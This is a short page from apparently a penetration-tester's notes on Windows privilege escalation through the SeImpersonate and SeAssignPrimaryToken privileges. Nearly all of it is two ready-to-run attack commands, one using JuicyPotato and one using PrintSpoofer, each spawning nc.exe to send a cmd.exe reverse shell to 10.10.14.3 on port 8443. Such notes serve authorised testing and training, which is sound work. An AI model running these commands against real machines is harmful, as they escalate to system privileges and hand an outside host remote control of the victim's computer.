SeImpersonate and SeAssignPrimaryToken

We can run JuicyPotato to escalate our privileges. 

JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

If that doesn't work try printspoofer

PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

PreviousSeDebugPrivilegeNextBackup Operators

Last updated